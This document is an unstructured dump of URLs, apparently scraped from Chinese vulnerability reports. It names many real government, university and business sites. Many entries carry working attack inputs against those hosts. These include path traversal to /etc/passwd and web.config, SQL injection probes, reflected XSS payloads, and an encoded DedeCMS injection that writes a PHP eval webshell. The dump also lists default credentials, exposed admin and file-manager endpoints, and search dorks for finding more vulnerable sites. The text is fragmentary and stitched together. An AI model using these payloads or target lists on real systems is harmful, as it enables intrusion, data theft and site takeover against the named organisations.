http://www.fzjsqqy.cn/vreg.aspx?parent_id=1 http://60.161.215.7:8888/main.aspx http://localhost/index.php?comment-view-1 http://exam.hebsafety.gov.cn/### http://110.249.219.99:7700/RS22/pub/pubQuery.jsp http://www.syyxyszyy.com/default/contents/content/i/182 http://101.227.1.138/10.zip http://101.227.1.138/11.zip http://101.227.1.138/12.zip http://101.227.1.138/13.zip http://101.227.1.138/14.zip http://61.172.247.30:8083/ admin:admin http://www.mbachina.com/plus/subjectajax.php?id=8&page=2 http://www.mbachina.com/down.php?path=../../../../../../../../../../etc/passwd http://www.baomi.org/zytsyx_info.php?optionid=48&auto_id=30 http://www.gzny.gov.cn/e/tool/gbook/xxmrindex.php?lyid=1712 http://221.228.213.154/login.jsp http://www.xxxx.com/sc8/sourceindex/search-byletter.do?pageId=6&letter=J http://114.80.128.174:8089/test/TestDosCommand.aspx http://hr.snda.com http://hr.snda.com/wintalent3/SNDA/web/index/showColumnInfo2!getNewsFromWeb?brandCode=1&webColumnID=5 http://family.meilishuo.com/share/family/vpn/vpn.html http://z.ev123.com/vip_ http://z.ev123.com/vip_****.html http://www.ev123.com/servers/login.php http://www.dlairport.com/DLAirWeb/DLAPFlight.aspx?flightno=aa&No=1 http://www.dlairport.com/DLAirWeb/DLAPFlight.aspx?flightno=aa&No=1 http://www.dlairport.com/DLAirWeb/DLAPFlight.aspx?flightno=aa&No=1 http://www.dlairport.com/DLAirWeb/3_33.aspx http://www.yl.yy.gov.cn/ys.asp?id=110 http://jdx.jsit.edu.cn/look_page_big.asp?yiid=66&erid= http://jdx.jsit.edu.cn/look_page_2.asp?yiid=64&erid=101 http://114.80.134.52:8085/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://116.211.21.204/bbs/bbs.rar http://180.96.39.133/ http://211.136.104.53:8055/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://211.136.104.52:8055/Standard/DownloadFile.aspx?filename= http://www.hising.com.cn http://www.fty163.com/data/shop.mdb www.bxgpower.com/data/shop.mdb www.gzgema.com/data/shop.mdb http://www.jwyb168.com.cn/data/shop.mdb http://hm.baidu.com/h.js http://101.227.1.153:8084/test/test.cgi http://support.ebs.sdo.com:8085/发现fckeditor,导致全盘遍历 http://**.**.**/ldczgzxt/gz_admin/login.asp http://zone.wooyun.org/content/4261 http://www.xxxxxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.xxxxx.org/plus/mytag_js.php?aid=1117 http://www.xxxxxxxx.org/plus/mybak.php http://voc.sdo.com/ http://www.jincin.com/index.htm tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1 tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1 http://cuc.jincin.com/ http://pku.jincin.com/ http://bucea.jincin.com/ http://bucea.jincin.com/ http://bjypc.jincin.com/ http://cauc.jincin.com/ http://ruc.jincin.com/ http://muc.jincin.com/ http://bit.jincin.com/ http://www.71.gov.cn/ http://www.114zb.com/114zb.zip http://mail.bjstats.gov.cn/cgi-bin/search.cgi https://121.8.154.250/cgi-bin/webif/status-basic.sh http://219.142.122.24/ http://219.142.122.24/admin.asp无需用户密码 http://110.249.221.236/CWDoc/Login/LogOn http://218.28.190.186:8080/dthealth/web/csp/logon.csp http://202.113.80.61/ http://202.113.80.61:80/login_check.asp http://ib.htsec.com/ http://ib.htsec.com/names.nsf/$users http://ib.htsec.com/webadmin.nsf即可 http://ib.htsec.com/download/filesets/netuser1.txt即可看到执行结果 http://www.yaofang.cn/a/user/order_detail/8038451 http://www.hk.cntaiping.com http://www.hk.cntaiping.com/product/wooyun.php http://oa.sp12396.cn/ http://med.xinhuamed.com.cn/SearchResult.aspx?cond=1 https://test1auth.ys7.com:8443/signIn?from=4e4148ba90184a7cbd81&r=428326093830372127&returnUrl=plugin&host=test1.ys7.com https://test1.ys7.com https://wap.alipay.com/personal/addContacts.htm?userId=2088802055471039 http://bjgcxx.baoji.gov.cn/list1.php?tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15 http://bjgcxx.baoji.gov.cn/list1.php?tid=1658&x www.benq.com.cn http://www.benq.com.cn/support/drivers/?conf_name=monitor&prod_model=BL2201M,其中的conf_name参数可以被注射 http://mana.doladola.cn:8080/baidu100tv_admin/mgmt/login.action http://dwygb.nwnu.edu.cn/Index.php?g=Home&m=Content&a=index&t=Default&webid=26&id=1和 http://dwygb.nwnu.edu.cn/Index.php?g=Home&m=Article&a=index&t=Default&webid=26&id=28&channelid=31&articleid=6310和 http://ltgy.nwnu.edu.cn/list.php?fid=42和 http://ltgy.nwnu.edu.cn/content.php?id=807和 http://zkzx.nwnu.edu.cn/zkcs/zkcs_show.php?zkcs_id=1 http://www.engl.polyu.edu.hk/Research_detail.php?recid=27和 http://www.engl.polyu.edu.hk/news_detail.php?newsid=68和 http://www.engl.polyu.edu.hk/Student_Community.php?newsid=5和 http://www.engl.polyu.edu.hk/ENGL_PROG.php?newsid=32 http://www.shop7z.com/demo/show_foot.asp?c_id=%2527 http://www.myhm.org/ http://www.myhm.org/rczx/SearchResult.asp?s_name=88952634 http://image.help.sdo.com/ http://image.help.sdo.com/admin.php?ctl=album&act=index http://image.help.sdo.com/admin.php?ctl=album&act=photos&album=187 http://image.help.sdo.com/admin.php?act=export&album=187&keyword= http://feedback.chinanews.com/ http://feedback.chinanews.com/ci/index.php,用户名和密码处都存在注入。root https://cxxjs.com/cgi-bin/login.cgi?action=log&fro=self# http://op.jlfzg.com:90/ebooking/ebookingAction!orderrequestEdit.action?selectorderrequestid=999977 http://www.315online.com/plus/ts_view.php?aid=10 http://www.315online.com/plus/ts_view.php?aid=10%27 http://www.315online.com/plus/ts_view.php?aid=111111 http://202.207.177.9/sjdr/xcj.aspx?xh=1 http://www.fjysgl.gov.cn/寻找注入点,http://www.fjysgl.gov.cn/orginfo/article_print.asp?showid=212 http://www.fjysgl.gov.cn/Admin_Login.aspx http://voc.sdo.com/uservoice.aspx http://voc.sdo.com:8013/index.aspx index.php/login/login http://wxd.baoji.gov.cn/news.php?category=12 http://wxd.baoji.gov.cn/admin/login.php http://42.96.149.96:7002/quhappyHotelSystem/sy.jsp http://pop.hengan.com/mail5/jilinbsc.nsf/MailFS/!OpenFrameSet http://189chuangyi.com/project/apply/baseinfo?projectId=541c764fe4b0278e7df0e22a http://zp.czinfo.net/chaxun.asp http://tuanwei.web.sdutcm.edu.cn/TeacherView.asp?id=18 inurl:news_info.asp?lb_id= http://www.xxxx.com/admin/index.asp http://www.hx-led.com.cn/news_info.asp?lb_id=13 www.dzhjckj.com/news_info.asp?lb_id=13 http://www.zhengbangfeed.com/news_info.asp?lb_id=13 http://www.drsjjpzs.com/news_info.asp?lb_id=172 www.fzdyj.net/news_info.asp?lb_id=22 www.chinatht.com/news_info.asp?lb_id=80 www.tyay.com.cn/news_info.asp?lb_id=7 www.jlys-bj.com/news_info.asp?lb_id=45 www.sisetech.com/news_info.asp?lb_id=22 http://www.ncad.net.cn/news_info.asp?lb_id=87 http://www.sxdachang.com/rongyu.asp?erid=5 http://demo.magicwinmail.com:6080/ http://m.huxiu.com/profile.html http://www.yundaex.com/ www.yundaex.com loader:URLLoader http://www.yf1668.com/index.asp http://112.124.41.23:38888/ http://112.124.41.23:38888/Project/ProjectJinDu.aspx?ProjectName=A11111111%A1%AA%A1%AA%CF%EE%C4%BF%C3%FB%B3%C6 http://112.124.41.23:38888/Project/PingShen.aspx?ProjectName=A11111111%A1%AA%A1%AA%CF%EE%C4%BF%C3%FB%B3%C6% http://112.124.41.23:38888/Project/TuXingJinDu.aspx?ProjectName=A11111111%A1%AA%A1%AA%CF%EE%C4%BF%C3%FB%B3%C6 com.tuniu.app.ui/com.tuniu.app.MessageReceiver com.tuniu.app.ui/cn.jpush.android.ui.PushActivity com.tuniu.app.ui/com.tuniu.app.MessageReceiver site:img.y.sdo.com http://lenovobbs.lcf5.lenovo.com.cn/thread-126866-1-1.html http://xtoa.lbex.com.cn/os/1/index.aspx http://pan.baidu.com/s/1tUeQU http://www.4001961200.com/portal/GetSms.do” http://www.baidu.com/xxx.apk&mobilesendMax=999&permoilesendMax=5” http://www.4001961200.com/portal/VerifyCode” http://demo.magicwinmail.com:6080/ http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://dz.pm.comsenz-service.com/,人品爆发,discuz dz.pm.comsenz-service.com/]$ encap:Ethernet addr:10.0.6.5 Bcast:10.0.6.255 Mask:255.255.255.0 fe89:162b/64 Scope:Link MTU:1500 packets:6530950 packets:5091834 txqueuelen:1000 http://glpt.sxaj.gov.cn/Design/pages/YingMa/news/downfile.aspx?FilePath=~/upload/20120427/129799872737343750.doc http://glpt.sxaj.gov.cn/Design/pages/YingMa/news/downfile.aspx?FilePath=~/web.config http://wenwen.sogou.com/user/taHome?sp=SQQ http://wenwen.sogou.com/user/taHome?sp=S10001 http://www.linkcloud.cn/cloudVm/buy/14 http://center.5i5j.com/managersection/managersectioninfo, http://center.5i5j.com/fangtoo/fangtoouserreg, http://cms.5i5j.com/admin/weituo/lottery/, http://cms.5i5j.com/admin/questionAdd/index/, http://www.bacic5i5j.com/admin/, http://cap.imooc.com/space/profile?uid=441076 http://cap.imooc.com/qa/280/order/1?textarea=&cid=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E http://cap.imooc.com/qa/292?textarea=&cid=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E http://my.xuan.news.cn/main.do http://demo.cuumall.com/index.php/home/detail/index?id=323 http://demo.cuumall.com/index.php/home/new/cxview/id/7 http://210.51.54.24/webmail/collect.xls http://www.tp.lydyyy.com.cn/View.asp?id=77 http://www.lysgzcx.hnloudi.gov.cn/lddqgzcx/gz_admin/login.asp http://www.gzcx.hnloudi.gov.cn/ldczgzxt/gz_admin/login.asp inurl:pubinfo/Moreysxk.asp?Qryqyxmbm http://www.tfxfdc.com/pubinfo/HouseSource.asp?forsearch=1 http://www.yafcj.com/pubinfo/HouseSource.asp?forsearch=1 http://www.jsxfgj.com//pubinfo/HouseSource.asp?forsearch=1 http://www.szfcsc.com/web/pubinfo/HouseSource.asp?forsearch=1 http://www.essfdc.gov.cn/pubinfo/HouseSource.asp?forsearch=1 http://www.szfcsc.com/web http://www.tmfdc.gov.cn/ http://www.hsfdc.com/web1 http://www.xnfcj.com/ http://www.jsxfgj.com/ http://www.eszfdc.gov.cn/ http://www.yxxfgj.com/ http://www.jcsfdc.com.cn http://www.yafcj.com http://www.tfxfdc.com http://www.ahjjjc.gov.cn/zwgk_msg.php?MsgId=96055 http://www.szsjw.gov.cn/zwgk_msg.php?MsgId=62295 http://www.tgsqjjjc.gov.cn/zwgk_msg.php?MsgId=65301 http://www.fcjjjc.gov.cn/zwgk_msg.php?MsgId=21632 http://www.mcjjjc.gov.cn/zwgk_msg.php?MsgId=80108 http://www.tljqjw.gov.cn/zwgk_msg.php?MsgId=59050 http://www.yqjjjc.gov.cn/zwgk_msg.php?MsgId=32445 http://www.wwjjjc.gov.cn/zwgk_msg.php?MsgId=32445 http://www.qmjjjc.gov.cn/zwgk_msg.php?MsgId=81281 http://www.fyyqjjjc.gov.cn/zwgk_msg.php?MsgId=37254 http://www.hslz.gov.cn/zwgk_msg.php?MsgId=32445 http://www.qcjjjc.gov.cn/zwgk_msg.php?MsgId=32445 http://cphi.chinacdc.cn/wz_02/to_index.ac http://www.huafi.com/ http://www.hnaf120.com/admin/login.aspx http://www.meigedianqi.com/admin/login.aspx http://www.wenjiao.cn/admin/login.aspx http://www.dextt.com/admin/login.aspx http://www.hfxseeds.com/admin/login.aspx http://www.shdrb.com/admin/login.aspx http://www.jckmgs.com/admin/login.aspx http://www.yfntsb.com/admin/login.aspx http://www.hggfj.com/admin/login.aspx http://www.runhe168.com/admin/login.aspx http://www.zzxfdz.com/admin/login.aspx http://www.bst-dz.com/admin/login.aspx http://www.zgfywh.com/admin/login.aspx http://zzdhcq.com/admin/login.aspx http://www.xiangyuanmenye.com/admin/login.aspx http://www.hnsxyt.com/admin/login.aspx http://www.shilifujian.com/admin/login.aspx http://www.zzmxkt.com/admin/login.aspx http://www.greehn.com.cn/admin/login.aspx http://www.huafi.cn/admin/login.aspx http://www.hgblower.com/admin/login.aspx http://www.hnaf120.com/admin/login.aspx http://thinkbbs.lenovo.com.cn/thread-126866-1-1.html http://drops.wooyun.org/papers/1383 http://www.sgin.cn/ inurl:abouts.php?id= http://www.xxxx.com/sgin/index.php http://www.attagems.com/abouts.php?id=9 http://www.hefna.net/abouts.php?id=9&aw=2 http://www.jgjzx.net/abouts.php?id=11&aw=1 http://www.knjkc.com/abouts.php?id=9&PHPSESSID=8ef8sqvl5a0otve5ij3jmg5077 http://www.gzawt.com/abouts.php?id=1 http://www.gzyzys.com/abouts.php?id=9&aw=1 http://www.gdgj13.com/abouts.php?id=10 http://changningwuliu.com/abouts.php?id=9 http://www.gztopde.com/abouts.php?id=12 http://www.mofonail.com/abouts.php?id=10&aw=1 http://www.gzjixian.com/abouts.php?id=10&aw=1 http://www.gzchemeida.com/abouts.php?id=10 http://www.youshun168.com/abouts.php?id=8 http://www.ouqier.com.cn/abouts.php?id=14 http://www.aoyangshebei.com/abouts.php?id=10 http://www.chuangzhi1688.com.cn/abouts.php?id=10&aw=3 http://sanyi-light.com/abouts.php?id=9 http://holy-gkids.com/abouts.php?id=14 http://www.gintec.cn/abouts.php?id=9&aw=1 http://好理吉.com/abouts.php?id=12&aw=1 http://zivvi.com.cn/wap/abouts.php?id=9 http://www.befxc.com/abouts.php?id=10 http://www.zh-xin.com/abouts.php?id=8 http://www.yipinxuangz.com/abouts.php?id=2 http://gdbeiqi.com/abouts.php?id=10 http://www.fayuhair.com/abouts.php?id=10 http://a1616358.sn20.gzonet.com/abouts.php?id=13 http://www.gzchuanli.com/abouts.php?id=9 http://gzflard.com/abouts.php?id=12 http://www.gzflard.com/abouts.php?id=10 http://jinglingrui.com/abouts.php?id=13 http://www.ekbio.cn/abouts.php?id=13 http://www.ronxinmachine.com.cn/abouts.php?id=1 http://www.gzruian.cn/abouts.php?id=5 http://yxtech.com.cn/abouts.php?id=11 http://www.chaldylan.com/abouts.php?id=13&aw=2 http://www.whwebsite.com/ inurl:About.aspx http://www.whhelmet.com/admin/Login.aspx http://www.qdzxy.com/keshi/keshi_view.aspx?id=7 http://202.102.41.12:8180/uc_server/ http://sc29.scut.edu.cn/ http://cs.hn96531.com/ http://cs.hn96531.com/manage/login/login.aspx http://cs.hn96531.com/manage/setting/ http://cs.hn96531.com/UC/这个目录,由于可以列目录所以轻松找到了文件上传页面(http://cs.hn96531.com/UC/c_fileUpload/Demo.aspx)。由于没有设置过滤所以轻松上传webshell。 http://waiqin.gdbnet.cn/LecManager/index,如图所示: http://www.mytaoyuan.com/ http://file.geely.com/ http://www.601.cn/taoyuan/ http://down.shinning.com.cn/ http://wx.jxqunli.com.cn/ http://sce.bda.edu.cn/ http://admin.yc22.com/ http://qydoc.yunip.com/ http://www2.miachina.cn/ http://doc.shslzx.cn/ http://www.xp6.net/ http://file.cnivs.com/ http://www.dycoal.cn/qydoc/ http://u.im906.com/ http://m.mop.com:80/ http://oa.fj.bnet.cn/oa/homepage/index_prod_intro.jsp http://oa.fj.bnet.cn/oa/homepage/index_prod_sample.jsp http://oa.fj.bnet.cn/oa/homepage/index.jsp http://www.ahomehotel.com:8081/oa/login.jsp http://hlbg.flylong.com.cn:8081/oa/login.jsp http://61.131.50.27:8081/oa/login.jsp http://oa.doone.com.cn/oa/login.jsp http://220.161.217.98:8082/oa/login.jsp http://222.77.67.205:8080/oa/login.jsp http://222.77.63.70:8081/oa/login.jsp http://218.66.159.28:8081/oa/login.jsp http://202.101.116.81/oa/login.jsp http://office.homeinns.com/hcs/login.aspx WWW.BAIXING.COM https://github.com/Acse/dandelion/blob/d1dbbeeebdb61fd8ae9557daca1d013dbc6c26f4/dandelion/application/library/Common/Email/Email.php https://github.com/90caoxu/commons/blob/ce2d8b602635aa0a25aa7821e2fab42c09c05526/src/main/java/com/lycos/commons/utils/Email.java http://zdjyxy.sysu.edu.cn,结果发现主页有后台管理登陆入口 http://xy.cmsproxy.sysu.edu.cn/cms/index.jsp http://sznews.zjol.com.cn/tgxt/ http://sznews.zjol.com.cn/tgxt/Web.config http://sznews.zjol.com.cn/tgxt/admin.aspx.cs http://sznews.zjol.com.cn/tgxt/index.aspx.cs http://sznews.zjol.com.cn/sznews/dxbbs8-access/Dxbbs8.aspx http://sznews.zjol.com.cn/sznews/dxbbs8-access/Forum.config https://code.google.com/p/chromium/issues/detail?id=143439 http://pinyin.sogou.com/dict/ywz/ajax/make_dict.php http://info.buynow.com.cn/Food/ShowDetail.aspx?id=67999&shopID=1071 http://novel.mse.sogou.com/catalog/action.php?c=../../../../../../../../../../etc/passwd%00.jpg&m=get&refer=latest&sogouid= http://novel.mse.sogou.com/catalog/action.php?c=../css/base.css%00.jpg&m=get&refer=latest&sogouid= http://www.1caitong.com/ http://www.qlszb.com/custom/CompanyCGList.aspx?ComId=1 http://zzhz1.zjol.com.cn/faq/ http://xsc.sdjzu.edu.cn/sms/manager/ http://xsc.sdjzu.edu.cn/sms/manager/excel/ http://wooyun.org/bugs/wooyun-2010-075231 http://it.homeinns.com/ito_beta/Search/Search.aspx http://w3m.huawei.com/m/servlet/index http://205.177.226.128:8080/asynchPeople/ http://jf.10086.cn/portal/user/web/UserAccountAction?action=saveAddress http://222.240.133.53:8080/dpmis/ https://github.com/badwtg1111/mymutt/blob/0008783c4d96176dae9324ccd6b741f89555ebb5/.msmtprc http://nx.bbn.com.cn/dgpt/list.php?type=2 http://shouji.sogou.com/wap/app/ajax.php?skin_id=0 http://119.39.124.142:10010/system/systemmain.aspx https://61.178.12.30/ https://61.178.20.170/ http://www.exploit-db.com/exploits/14884/ http://112.83.255.228:9999 facetime:IcanCallU@good.com http://course.fafu.edu.cn/youcha/login.asp http://59.79.230.99/wsbz/ http://202.205.91.108/fjnlzp/showPolicyBulletinDetail.php?type=3&id=16 http://course.fafu.edu.cn/nfsb/login.asp http://course.fafu.edu.cn/lxsyzx/login.asp http://210.34.80.123/webquery/ http://xccbank.com/admin http://xccbank.com/phpmyadmin/ inurl:Login.aspx?Role=author http://fzxb.nenu.edu.cn/Login.aspx?Role=author http://heuxb.hrbeu.edu.cn/Login.aspx?Role=author http://qhxb.lib.tsinghua.edu.cn/Login.aspx?Role=author http://ndxbskb.imu.edu.cn/Login.aspx?Role=author http://www.xsdxbzk.com/Login.aspx?Role=author http://www.yxyjsxb.com/Login.aspx?Role=author http://journalrw.nbu.edu.cn/Login.aspx?Role=author http://njsfdxzrb.paperonce.org/Login.aspx?Role=author http://trxyxb.gztrc.edu.cn/Login.aspx?Role=author http://xbzrb1.henu.edu.cn/Login.aspx?Role=author http://www.chinatelecomiot.com http://www.samsoncn.com/ http://www.samsoncn.com/product/Customers.aspx http://www.qhda.gov.cn/platformData/infoplat/pub/qhdaweb_2662/include_page/down.jsp?downpath=../../../../index.jsp http://sh.119.gov.cn/infoplat/platformData/infoplat/pub/xiaofang_2542/docs/201012/res_show/include_page/down.jsp?downpath=../../../../../index.jsp http://www.yxarchive.gov.cn/yxdaweb/platformData/infoplat/pub/yxdaweb_2532/include_page/down.jsp?downpath=../../../../index.jsp http://daj.xinxiang.gov.cn/xxdaweb/platformData/infoplat/pub/xxdaweb_32/include_page/down.jsp?downpath=../../../../index.jsp http://221.232.141.109/ http://221.232.141.109/login2.asp http://club.suning.com/forum.php?mod=viewthread&tid=2228206&page=1&extra=#pid29908324 http://szuhr.szu.edu.cn/idxNewsView.asp?nID=190 http://jingpin.szu.edu.cn/arts/teachdetail.asp?ProductId=223 http://www.essfdc.gov.cn/PubInfo/lpxx.asp?qyxmbm=DBDHDBDHDADADDDGDDDBDCDJ000001 http://www.xnfcj.com/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADHDGDDDBDCDB000004 http://www.hsfdc.com/web/Pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADGDEDDDBDCDE000002 http://www.szfcsc.com/web/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADCDEDDDBDCDI000001 http://www.tmfdc.gov.cn/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADCDIDDDBDCDE000001 http://www.hgfgj.com:7201/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADHDCDDDBDCDF000001 http://www.jsxfgj.com/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADADEDDDBDCDA000001 http://www.ltxfdc.com/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADBDBDDDBDCDC000001 http://www.yxxfgj.com/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADCDDDDDBDCDJ000001 http://www.yafcj.com/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADADDDDDBDCDB000003 http://www.dyfdc.net.cn/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADEDBDDDBDCDJ000002 http://www.haxfdc.com/web/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADADHDDDBDCDH000001 http://jingpin.szu.edu.cn/jingpin2008/wuliu/news.asp?id=84 www.docer.com是不是他的新版本啊),发现不少好模板,那咱就找找吧。 http://docer.wps.cn/threadview/wdid-205895.htm http://wdl1.cache.wps.cn/wps/cdnwps/upload/official/template/2014-9-11/5411436c45134.ppt http://img2.template.cache.wps.cn/wps/cdnwps/upload/official/preview//vip/2013-9-17/5238197f1b133_1.jpg http://wdl1.cache.wps.cn/wps/cdnwps/upload/official/template2013-9-17/5238197f1b133.dpt http://wdl1.cache.wps.cn/wps/cdnwps/upload/official/template/vip/2013-9-17/5238197f1b133.dpt http://www.cdjcy.gov.cn/ http://125.71.206.32:8082/WSJB/WSJBApply.aspx?dwbm=510100 inurl:information.jsp?xmid= http://ahfp.ah.gov.cn/information.jsp?xmid=1316%20and%201=2 http://ahfp.ah.gov.cn/information.jsp?xmid=1316%20and%201=1 http://ahzhgzjb.ahpc.gov.cn:8080/information.jsp?xmid=2903%20and%201=2 http://ahzhgzjb.ahpc.gov.cn:8080/information.jsp?xmid=2903%20and%201=1 http://861.ahpc.gov.cn:9090/ahjjyj/information.jsp?xmid=4236%20and%201=2 http://861.ahpc.gov.cn:9090/ahjjyj/information.jsp?xmid=4236%20and%201=1 http://220.178.99.139:9090/ahjjyj/information.jsp?xmid=4446%20and%201=2 http://220.178.99.139:9090/ahjjyj/information.jsp?xmid=4446%20and%201=1 http://61.191.20.186:8080/ahdrcoa/information.jsp?xmid=724%20and%201=2 http://61.191.20.186:8080/ahdrcoa/information.jsp?xmid=724%20and%201=1 http://www.u-mh.com/MyAdmin/Main.php http://www.waimai.meituan.com/comment/5192 www.ssap.com.cn/SKWX/XueShu/XueShu_SearchInfo.aspx?searchText=asd&channelId=10029 www.ssap.com.cn/SKWX/XueShu/XueShu_SearchInfo.aspx?se http://sqlmap.org http://uqwk.com/utility/convert/index.php https://url/base/sys/download_bak.php https://url/base/include/download.php?filename=mysql_data.sql.gz&path=/opt/ https://url/base/include/download.php?filename=要下载的文件名&path=文件路径 https://222.92.15.100/base/login/login.php https://angelic.com.cn/base/login/login.php http://121.30.232.54:9080/ycportal/jsp/AD/ADupdate.jsp?flag=update&checkbox_id=85 http://etungtech.com.cn/ http://www.etungtech.com.cn/solution.aspx?CateId=51&BaseInfoCateId=51 intitle:WEBLED信息发布管理系统 http://www.listentech.com.cn/(灵信科技)为例,struts执行漏洞 http://envi.ruc.edu.cn/newcn/ http://www.viewgood.cn/channels/4.html)给出的案例包含: http://www.qiye.org.cn/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://ahjinf.com/news_show.php?cat_pid=2&cat_id=15&art_id=66 http://www.ahjinf.com/news_show.php?cat_pid=2&cat_id=15&art_id=63 http://www.ahswhg.cn/news_show.php?cat_pid=7&cat_id=13&art_id=3959 http://sflff.w400.zhujichina.com/news_show.php?cat_pid=5&art_id=558&cat_id=27 http://www.shahejiuye.com/news_show.php?cat_pid=3&cat_id=20&art_id=377 http://www.xinruigroup.com.cn/news_show.php?cat_pid=2&cat_id=33&art_id=261 http://www.ahyanhu.cn/news_show.php?cat_pid=2&cat_id=12&art_id=255 http://www.ahamf.com/news_show.php?cat_pid=2&cat_id=10&art_id=4 http://www.hf-sf.cn/news_show.php?cat_pid=2&cat_id=16&art_id=674 http://龙桥矿业.中国/news_show.php?cat_pid=2&cat_id=16&art_id=323 http://www.cnfubang.com/news_show.php?cat_pid=2&cat_id=17&art_id=8 http://www.banlanherb.com/news_show.php?cat_pid=4&cat_id=16&art_id=163 http://www.ahswzk.com/news_show.php?cat_pid=3&cat_id=12&art_id=246 http://www.jljt.cc/news_show.php?cat_pid=5&cat_id=23&art_id=64 http://www.lqky.cn/news_show.php?cat_id=36&cat_pid=4&art_id=337 http://www.ahlh88.cn/news_show.php?cat_pid=3&cat_id=7&art_id=81 http://www.新中建.com/news_show.php?cat_pid=2&cat_id=10&art_id=4 http://www.龙桥矿业.com/news_show.php?cat_pid=2&cat_id=14&art_id=219 http://敏欣电器.com/news_show.php?cat_pid=4&cat_id=12&art_id=14 http://tianzhugg.com/news_show.php?cat_pid=2&cat_id=15&art_id=33 http://ahjzsm.cn/news_show.php?cat_pid=2&cat_id=19&art_id=41 http://www.zhongligroup.cn/news_show.php?cat_pid=2&cat_id=15&art_id=178 http://www.jinleijituan.com/news_show.php?cat_pid=6&cat_id=27&art_id=67 http://www.talw.com.cn/news_show.php?cat_pid=2&cat_id=14&art_id=57 http://yingjia.tm/news_show.php?cat_pid=6&cat_id=36&art_id=1263 http://jinleijituan.com.cn/news_show.php?cat_pid=5&cat_id=23&art_id=51 http://www.ahmxdq.com.cn/news_show.php?cat_pid=4&cat_id=11&art_id=3 http://www.liyouit.com/ http://www.casc16.cn/showarticle.php?aid=208 http://www.shanxiyinkuang.com/showarticle.php?aid=29 http://www.zt25jxb.com/showarticle.php?aid=406 http://www.051jd.com/showarticle.php?aid=293 http://www.crecgwm.com/showarticle.php?aid=4067 http://www.sx8j.com/showarticle.php?aid=360 http://www.ch-westernbuildingdesign.com/showarticle.php?aid=176 http://www.sx-jz.com.cn/showarticle.php?aid=381 http://www.linpeils.com/showarticle.php?aid=173 http://www.shanxihangkong.com/showarticle.php?aid=317 http://www.yzgdcm.cn/page.php?id=11 https://***.chinacache.net/index.jsp http://www.oss.org.cn http://yp.oss.org.cn/software/show_demo.php?sw_id=155&demo_no=1 http://norc.szu.edu.cn:8080/college/teacher.asp?ID=300 http://www.51mike.com/pages/login/login.jsp?from=app&RSRU=http://www.51mike.com/ http://m.cndns.com:80/ 